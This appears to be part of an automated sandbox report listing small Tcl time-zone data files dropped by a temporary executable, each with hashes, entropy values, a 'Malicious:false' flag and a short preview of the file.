                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Guam)]} {. LoadTimeZoneFile Pacific/Guam.}.set TZData(:Pacific/Saipan) $TZData(:Pacific/Guam).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):188
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.729839728044672
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQGurKeTIVAIgObTurKeUAtnUDHthA5nUDHurKeTv:SlSWB9IZaM3ycieZVAIgObieiNXeg
                                                                                                                                                                                                                                                                                                                                MD5:843BBE96C9590D69B09FD885B68DE65A
                                                                                                                                                                                                                                                                                                                                SHA1:25BF176717A4578447E1D77F9BF0140AFF18625A
                                                                                                                                                                                                                                                                                                                                SHA-256:4F031CB2C27A3E311CA4450C20FB5CF4211A168C39591AB02EEEC80A5A8BFB93
                                                                                                                                                                                                                                                                                                                                SHA-512:B50301CFC8E5CF8C257728999B0D91C06E2F7C040D30F71B90BBC612959B519E8D27EE2DA9B8B9002483D3F4F173BB341A07898B4E4C98A146B3D988CA3BD5B2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Pago_Pago)]} {. LoadTimeZoneFile Pacific/Pago_Pago.}.set TZData(:Pacific/Samoa) $TZData(:Pacific/Pago_Pago).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):148
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.900317309402027
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5nUDHqhFtXGm2OHl/oevUdNqRU8Cn:SlSWB9X5TTEm2OHloeYqRQn
                                                                                                                                                                                                                                                                                                                                MD5:DDF599B7659B88603DF80E390471CB10
                                                                                                                                                                                                                                                                                                                                SHA1:80FF5E0E99483CB8952EC137A261D034B6759D07
                                                                                                                                                                                                                                                                                                                                SHA-256:B8282EC1E5BFA5E116C7DC5DC974B0605C85D423519F124754126E8F8FE439EC
                                                                                                                                                                                                                                                                                                                                SHA-512:28F15CB6310190066936B7B21024205EC87A54D081415B1E46E72982814E1E2A41A2CE8B808D02E705100CE5ACBB1E69F1859E40A04F629B7004FBD89DD37899
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Tahiti) {. {-9223372036854775808 -35896 0 LMT}. {-1806674504 -36000 0 -10}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):146
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.924466748251822
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5nUDHqQwcXGm2OHyyFpoevXmciRrWFN0UIvYv:SlSWB9X5TbTm2OHyyFGePmbu0a
                                                                                                                                                                                                                                                                                                                                MD5:AE5E0FFFEEFD0A8E77233CB0E59DE352
                                                                                                                                                                                                                                                                                                                                SHA1:7B7CC1095FB919946F3315C4A28994AEB1ECD51A
                                                                                                                                                                                                                                                                                                                                SHA-256:1FCC6C0CC48538EDB5B8290465156B2D919DFA487C740EB85A1DF472C460B0E6
                                                                                                                                                                                                                                                                                                                                SHA-512:1693FA5DE78FDCF79993CB137EE0568A4B8245D0177DF845356B3C2418641C8AA23CAA7069707C0E180FF9F5345D380A3575EEFFE0C8BC08E18E40ED0E1F6FA3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Tarawa) {. {-9223372036854775808 41524 0 LMT}. {-2177494324 43200 0 +12}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):436
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.271209640478309
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp5kJmdHmLP72Dcw8UtnKbUtrtAUt54bUtjg:cOem77il2eQ
                                                                                                                                                                                                                                                                                                                                MD5:C32CDBF9C696134870351ABB80920E08
                                                                                                                                                                                                                                                                                                                                SHA1:43918B7BF46EF2B574D684D36901592E43A45A8A
                                                                                                                                                                                                                                                                                                                                SHA-256:8FE5EF266C660C4A25827BE9C2C4081A206D946DD46EBC1095F8D18F41536399
                                                                                                                                                                                                                                                                                                                                SHA-512:1E10C548659A9CE0A9F0C7E6FD86EAD8627C07A8C9842933E7C6CD28EACDE3735DBFDCF7DD1DE5DDE7F2F102F7D584B3C44B1350AFDF7E1621FE9F565CD32362
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Tongatapu) {. {-9223372036854775808 44360 0 LMT}. {-2177497160 44400 0 +1220}. {-915193200 46800 0 +13}. {915102000 46800 0 +13}. {939214800 50400 1 +13}. {953384400 46800 0 +13}. {973342800 50400 1 +13}. {980596800 46800 0 +13}. {1004792400 50400 1 +13}. {1012046400 46800 0 +13}. {1478350800 50400 1 +13}. {1484398800 46800 0 +13}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):175
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.865414495402954
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG9CovedVAIgObT9CknUDHqAOsvUDH9Cov:SlSWB9IZaM3yckGedVAIgObkkTAOmy
                                                                                                                                                                                                                                                                                                                                MD5:3282C08FE7BC3A5F4585E97906904AE1
                                                                                                                                                                                                                                                                                                                                SHA1:09497114D1EC149FB5CF167CBB4BE2B5E7FFA982
                                                                                                                                                                                                                                                                                                                                SHA-256:DC6263DCC96F0EB1B6709693B9455CB229C8601A9A0B96A4594A03AF42515633
                                                                                                                                                                                                                                                                                                                                SHA-512:077924E93AC9F610CD9FE158655B631186198BD96995428EB9EE2082449BD36CBF6C214D86E51A6D9A83329FCD5E931C343AA14DBB286C53071D46692B81BC0D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Chuuk)]} {. LoadTimeZoneFile Pacific/Chuuk.}.set TZData(:Pacific/Truk) $TZData(:Pacific/Chuuk).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):144
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9366125478034935
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5nUDHp8FkXGm2OH4VkxYvXmcDVv0UIvYv:SlSWB9X5PJm2OHYkxYPmyv0a
                                                                                                                                                                                                                                                                                                                                MD5:AD4044C0F87566AA5265DA84CD3DABBA
                                                                                                                                                                                                                                                                                                                                SHA1:15ED1B5960B3E70B23C430B0281B108506BBE76C
                                                                                                                                                                                                                                                                                                                                SHA-256:2C273BA8F8324E1B414B40DC356C78E0FD3C02D5E8158EA5753CA51E1185FC11
                                                                                                                                                                                                                                                                                                                                SHA-512:AD4758B01038BCAA519776226B43D90CED89292BA47988F639D45FD5B5436ED4E3B16C27F9145EC973DCC242FF6ADC514D7CDD6660E7CE8DD8E92A96CDACD947
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Wake) {. {-9223372036854775808 39988 0 LMT}. {-2177492788 43200 0 +12}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):146
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.932023172694197
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx5nUDHpEf/kXGm2OH3UPvXmcCRQH0UIvYv:SlSWB9X5tfTm2OHkPPmiH0a
                                                                                                                                                                                                                                                                                                                                MD5:9FBFA7A7556A081F2352250B44EB0CB6
                                                                                                                                                                                                                                                                                                                                SHA1:CB16A38A9E51FEFC803C4E119395B9BCDBA1CF95
                                                                                                                                                                                                                                                                                                                                SHA-256:29ABBA5D792FB1D754347DED8E17423D12E07231015D5A65A5873BFC0CE474C7
                                                                                                                                                                                                                                                                                                                                SHA-512:CD0FA19597D7188F1D05E8FE9DD9B650DDD30CBBEF3F16646715D5DEF5A261C1E92ADE781DEA609B163808D7A59A0F7AF168332D0134D87DADE42447ABE7E431
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Pacific/Wallis) {. {-9223372036854775808 44120 0 LMT}. {-2177496920 43200 0 +12}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.887747451136248
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqTQG9CovedVAIgObT9CknUDHnHPUDH9Cov:SlSWB9IZaM3yckGedVAIgObkkeBy
                                                                                                                                                                                                                                                                                                                                MD5:63594F45385660A04D21C11B5F203FF4
                                                                                                                                                                                                                                                                                                                                SHA1:CEEC55B952B8EBA952E0965D92220C8EF001E59E
                                                                                                                                                                                                                                                                                                                                SHA-256:4418559478B5881DFAF3FE3246A4BFE2E62C46C1D3D452EE4CF5D9651C4F92B5
                                                                                                                                                                                                                                                                                                                                SHA-512:B9B55B027EFB7E87D44E89191C03A8409A16FA19A52032E29210161AE8FED528A6504B7B487181847125AF2C7C129A0687323CDDC6D5454199229897F97F0AB0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Chuuk)]} {. LoadTimeZoneFile Pacific/Chuuk.}.set TZData(:Pacific/Yap) $TZData(:Pacific/Chuuk).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):169
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.89278153269951
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVqEGIVyVAIgoqpEGuHtnSi67x/yQa0EGIv:SlSWB9IZaM3ymczVAIgocuN27x6qS
                                                                                                                                                                                                                                                                                                                                MD5:975F22C426CE931547D50A239259609A
                                                                                                                                                                                                                                                                                                                                SHA1:77D68DF6203E3A2C1A2ADD6B6F8E573EF849AE2E
                                                                                                                                                                                                                                                                                                                                SHA-256:309DE0FBCCDAE21114322BD4BE5A8D1375CD95F5FC5A998B3F743E904DC1A131
                                                                                                                                                                                                                                                                                                                                SHA-512:ABDF01FCD0D34B5A8E97C604F3976E199773886E87A13B3CDD2319A92BD34D76533D4BA41978F8AAA134D200B6E87F26CB8C223C2760A4D7A78CD7D889DB79BE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Warsaw)]} {. LoadTimeZoneFile Europe/Warsaw.}.set TZData(:Poland) $TZData(:Europe/Warsaw).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):171
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.887895128079745
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqxVxMvLSwFVAIgoqyMvLN6nM24h8QavMvLu:SlSWB9IZaM3ymvMv2wFVAIgovMvUe81B
                                                                                                                                                                                                                                                                                                                                MD5:31202B87B7352110A03D740D66DCD967
                                                                                                                                                                                                                                                                                                                                SHA1:439A3700721D4304FA81282E70F6305BB3706C8D
                                                                                                                                                                                                                                                                                                                                SHA-256:8288E9E5FC25549D6240021BFB569ED8EB07FF8610AAA2D39CD45A025EBD2853
                                                                                                                                                                                                                                                                                                                                SHA-512:AB95D3990DC99F6A06BF3384D98D42481E198B2C4D1B2C85E869A2F95B651DDF64406AB15C485698E24F26D1A081E22371CE74809915A7CCA02F2946FB8607BF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Lisbon)]} {. LoadTimeZoneFile Europe/Lisbon.}.set TZData(:Portugal) $TZData(:Europe/Lisbon).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):160
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.743612967973961
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8qMvedVAIgNqBolOr4WFKfMv:SlSWB9IZaM3yKMvedVAIgcBoS4wKfMv
                                                                                                                                                                                                                                                                                                                                MD5:A0C5022166493D766E827B88F806CA32
                                                                                                                                                                                                                                                                                                                                SHA1:2A679A391C810122DDD6A7EF722C35328FC09D9C
                                                                                                                                                                                                                                                                                                                                SHA-256:537EA39AFBA7CFC059DE58D484EF450BEE73C7903D36F09A16CA983CB5B8F686
                                                                                                                                                                                                                                                                                                                                SHA-512:85FEF0A89087D2196EC817A6444F9D94A8D315A64EAE9615C615DBB79B30320CED0D49A1A6C2CD566C722971FA8908A675B1C8F7E64D6875505C60400219F938
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Taipei)]} {. LoadTimeZoneFile Asia/Taipei.}.set TZData(:ROC) $TZData(:Asia/Taipei).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):157
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.851755466867201
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8ZQckvFVAIgNtvQstlmFeWFKKQs:SlSWB9IZaM3yJmFVAIgztpwKg
                                                                                                                                                                                                                                                                                                                                MD5:48E7BE02E802A47C0D2F87E633010F38
                                                                                                                                                                                                                                                                                                                                SHA1:A547853A7ED03CE9C07FC3BAA0F57F5ABB4B636B
                                                                                                                                                                                                                                                                                                                                SHA-256:2F362169FD628D6E0CB32507F69AD64177BC812E7E961E5A738F4F492B105128
                                                                                                                                                                                                                                                                                                                                SHA-512:BCBE9BC1C08CFF97B09F8D566EC3B42B9CE8442FA4BECE37A18446CBBF0ECEDA66BA18ABFA5E52E7677B18FB5DABF00DF9E28DE17B094A690B097AFC7130EA89
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Seoul)]} {. LoadTimeZoneFile Asia/Seoul.}.set TZData(:ROK) $TZData(:Asia/Seoul).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):175
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.80663340464643
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq801cwFVAIgNtK1ERLkZ8O5h4WFKf1E:SlSWB9IZaM3yUpFVAIgWWLkth4wKfK
                                                                                                                                                                                                                                                                                                                                MD5:9E2902F20F33CA25B142B6AA51D4D54F
                                                                                                                                                                                                                                                                                                                                SHA1:C1933081F30ABB7780646576D7D0F54DC6F1BC51
                                                                                                                                                                                                                                                                                                                                SHA-256:FCF394D598EC397E1FFEED5282874408D75A9C3FFB260C55EF00F30A80935CA4
                                                                                                                                                                                                                                                                                                                                SHA-512:D56AF44C4E4D5D3E6FC31D56B9BA36BD8499683D1A3C9BC48EEE392C4AC5ACAA10E3E82282F5BDA9586AF26F4B6C0C5649C454399144F040CC94EA35BBB53B48
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Singapore)]} {. LoadTimeZoneFile Asia/Singapore.}.set TZData(:Singapore) $TZData(:Asia/Singapore).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):196
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.951561086936219
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSNJB9IZaM3y7p5oedVAIgppKNkjx+90pu:JBaIMYYpgN8+90M
                                                                                                                                                                                                                                                                                                                                MD5:A1D42EC950DE9178058EAA95CCFBAA09
                                                                                                                                                                                                                                                                                                                                SHA1:55BE1FAF85F0D5D5604685F9AC19286142FC7133
                                                                                                                                                                                                                                                                                                                                SHA-256:888A93210241F6639FB9A1DB0519407047CB7F5955F0D5382F2A85C0C473D9A5
                                                                                                                                                                                                                                                                                                                                SHA-512:3C6033D1C84B75871B8E37E71BFEE26549900C555D03F8EC20A31076319E2FEBB0240EC075C2CAFC948D629A32023281166A7C69AFEA3586DEE7A2F585CB5E82
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Puerto_Rico)]} {. LoadTimeZoneFile America/Puerto_Rico.}.set TZData(:SystemV/AST4) $TZData(:America/Puerto_Rico).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):187
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.900537547414888
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFLLJJT8QFCZaMuUyqx02NEO4FVAIg202NEtYFkRDwh4IAcGE2NEOv:SlSNJB9IZaM3y7UEO4FVAIgpUEqFk+4b
                                                                                                                                                                                                                                                                                                                                MD5:CFDB782F87A616B89203623B9D6E3DBF
                                                                                                                                                                                                                                                                                                                                SHA1:1BB9F75215A172B25D3AE27AAAD6F1D74F837FE6
                                                                                                                                                                                                                                                                                                                                SHA-256:62C72CF0A80A5821663EC5923B3F17C12CE5D6BE1E449874744463BF64BCC3D7
                                                                                                                                                                                                                                                                                                                                SHA-512:085E5B6E81E65BC781B5BC635C6FA1E7BF5DC69295CF739C739F6361BF9EB67F36F7124A2D3E5ADA5F854149C84B9C8A7FB22E5C6E8FF57576EBDEA0E4D6560B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Halifax)]} {. LoadTimeZoneFile America/Halifax.}.set TZData(:SystemV/AST4ADT) $TZData(:America/Halifax).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.911352504536709
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFLLJJT8QFCZaMuUyqx0sAzE5YyVAIg20sAzEvYvW6kR/eIAcGEsAzEun:SlSNJB9IZaM3y7hzipVAIgphzGCW6kcQ
                                                                                                                                                                                                                                                                                                                                MD5:01215B5D234C433552A3BF0A440B38F6
                                                                                                                                                                                                                                                                                                                                SHA1:B3A469977D38E1156B81A93D90E638693CFDBEEF
                                                                                                                                                                                                                                                                                                                                SHA-256:2199E7DD20502C4AF25D57A58B11B16BA3173DB47EFA7AD2B33FDB72793C4DDB
                                                                                                                                                                                                                                                                                                                                SHA-512:35D3BDE235FF40C563C7CEDD8A2CCBB4BAC2E2AA24A8E072EA0572BB231295D705EA9F84EEAA9FD2C735B1203332D8D97C3592A2B702BCFE9C81828D4F635205
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Regina)]} {. LoadTimeZoneFile America/Regina.}.set TZData(:SystemV/CST6) $TZData(:America/Regina).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):187
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.929669998131187
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFLLJJT8QFCZaMuUyqx096dVAIg2096zAtkRwx/h4IAcGE96s:SlSNJB9IZaM3y796dVAIgp96Wkyxp49c
                                                                                                                                                                                                                                                                                                                                MD5:CDE40B5897D89E19A3F2241912B96826
                                                                                                                                                                                                                                                                                                                                SHA1:00DE53DC7AA97F26B1A8BF83315635FBF634ABB3
                                                                                                                                                                                                                                                                                                                                SHA-256:3C83D3DB23862D9CA221109975B414555809C27D45D1ED8B9456919F8BA3BF25
                                                                                                                                                                                                                                                                                                                                SHA-512:69DFC06ACF544B7F95DEF2928C1DFE4D95FAD48EE753AD994921E1967F27A3AF891A9F31DDEA547E1BED81C5D2ECF5FC93E75019F2327DE1E73A009422BE52EC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Chicago)]} {. LoadTimeZoneFile America/Chicago.}.set TZData(:SystemV/CST6CDT) $TZData(:America/Chicago).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):199
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.881715127736134
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSNJB9IZaM3y73G7mFVAIgp3GBLkkp4903G1:JBaIMY3G7Hp3GBLVp4903G1
                                                                                                                                                                                                                                                                                                                                MD5:87FEA19F6D7D08F44F93870F7CBBD456
                                                                                                                                                                                                                                                                                                                                SHA1:EB768ECB0B1B119560D2ACBB10017A8B3DC77FDD
                                                                                                                                                                                                                                                                                                                                SHA-256:2B5887460D6FB393DED5273D1AA87A6A9E1F9E7196A8FA11B4DEB31FAD8922C8
                                                                                                                                                                                                                                                                                                                                SHA-512:00DA47594E80D2DB6F2BE6E482A1140780B71F8BBE966987821249984627C5D8C31AA1F2F6251B4D5084C33C66C007A47AFF4F379FA5DA4A112BA028B982A85A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indianapolis)]} {. LoadTimeZoneFile America/Indianapolis.}.set TZData(:SystemV/EST5) $TZData(:America/Indianapolis).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.071686349792137
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFLLJJT8QFCZaMuUyqx0wAy0vwVAIg20wAyatkR5ghxEH/h4IAcGEwAy0v:SlSNJB9IZaM3y71KVAIgp1Bkrp4901h
                                                                                                                                                                                                                                                                                                                                MD5:5C43C828D9460B9DF370F0D155B03A5C
                                                                                                                                                                                                                                                                                                                                SHA1:92F92CD64937703D4829C42FE5656C7CCBA22F4E
                                                                                                                                                                                                                                                                                                                                SHA-256:3F833E2C2E03EF1C3CC9E37B92DBFBA429E73449E288BEBE19302E23EB07C78B
                                                                                                                                                                                                                                                                                                                                SHA-512:A88EAA9DAAD9AC622B75BC6C89EB44A2E4855261A2F7077D8D4018F00FC82E5E1EA364E3D1C08754701A545F5EC74752B9F3657BF589CF76E5A3931F81E99BBF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/New_York)]} {. LoadTimeZoneFile America/New_York.}.set TZData(:SystemV/EST5EDT) $TZData(:America/New_York).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):188
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.927529755640769
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFLLJJT8QFCZaMuUyqTQG2fWGYFedVAIgObT2fWzvNkRSm1hpUDH2fWRn:SlSNJB9IZaM3yc6e8dVAIgOb6ezvNkQN
                                                                                                                                                                                                                                                                                                                                MD5:1A50997B6F22E36D2E1849D1D95D0882
                                                                                                                                                                                                                                                                                                                                SHA1:F4AC3ABBEA4A67013F4DC52A04616152C4C639A9
                                                                                                                                                                                                                                                                                                                                SHA-256:C94C64BF06FDE0A88F24C435A52BDDE0C5C70F383CD09C62D7E42EAB2C54DD2C
                                                                                                                                                                                                                                                                                                                                SHA-512:CCBD66449983844B3DB440442892004D070E5F0DFF454B25C681E13EB2F25F6359D0221CE5FF7800AC794A32D4474FE1126EA2465DB83707FF7496A1B39E6E1A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by ../tools/tclZIC.tcl - do not edit.if {![info exists TZData(Pacific/Honolulu)]} {. LoadTimeZoneFile Pacific/Honolulu.}.set TZData(:SystemV/HST10) $TZData(:Pacific/Honolulu).
